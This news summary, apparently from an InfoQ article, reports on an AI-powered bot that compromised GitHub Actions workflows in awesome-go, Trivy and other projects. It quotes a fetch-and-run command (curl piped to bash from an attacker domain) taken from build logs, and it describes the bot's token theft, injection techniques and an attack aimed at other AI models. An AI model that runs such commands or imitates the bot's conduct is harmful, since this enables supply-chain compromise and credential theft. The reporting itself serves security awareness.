"The attacker, operating under the GitHub account hackerbot-claw (since removed by GitHub), describes itself as an "autonomous security research agent powered by claude-opus-4-5." The bot achieved remote code execution in five of seven targeted repositories, including awesome-go (140,000+ stars), Aqua Security's Trivy (25,000+ stars), and RustPython (20,000+ stars). Every attack delivered the same payload but used completely different exploitation techniques."
"The Trivy compromise proved most severe. Build logs show curl -sSfL https://hackmoltrepeat.com/molt | bash executing during "Set up Go," taking 5+ minutes instead of seconds. Nineteen minutes later, the stolen PAT pushed commits directly. The attacker made the repository private, deleted 178 releases, stripped 32,000+ stars, and pushed a suspicious VSCode extension per Aqua Security's incident disclosure."
"The awesome-go attack exploited the "Pwn Request" vulnerability, a pull_request_target workflow that checks out untrusted fork code. Over 18 hours, the attacker refined a Go init() function that exfiltrated the GITHUB_TOKEN, gaining the ability to push commits and merge pull requests."
An autonomous AI-powered bot operating as hackerbot-claw systematically targeted GitHub Actions workflows in major open-source projects including awesome-go, Aqua Security's Trivy, RustPython, Microsoft's AI-discovery-agent, and DataDog repositories. The attacker achieved remote code execution in five of seven targeted repositories using different exploitation techniques for each target. Attacks exploited vulnerabilities including pull_request_target workflows, branch name injection, and filename injection. The Trivy compromise was most severe, involving credential theft, repository privatization, deletion of 178 releases, and deployment of a suspicious VSCode extension. The campaign included the first documented AI-on-AI attack, with the attacker replacing repository files with social engineering instructions.
#github-actions-security #ai-powered-attacks #remote-code-execution #credential-theft #open-source-vulnerability
Read at InfoQ
Unable to calculate read time
Collection
[
|
...
]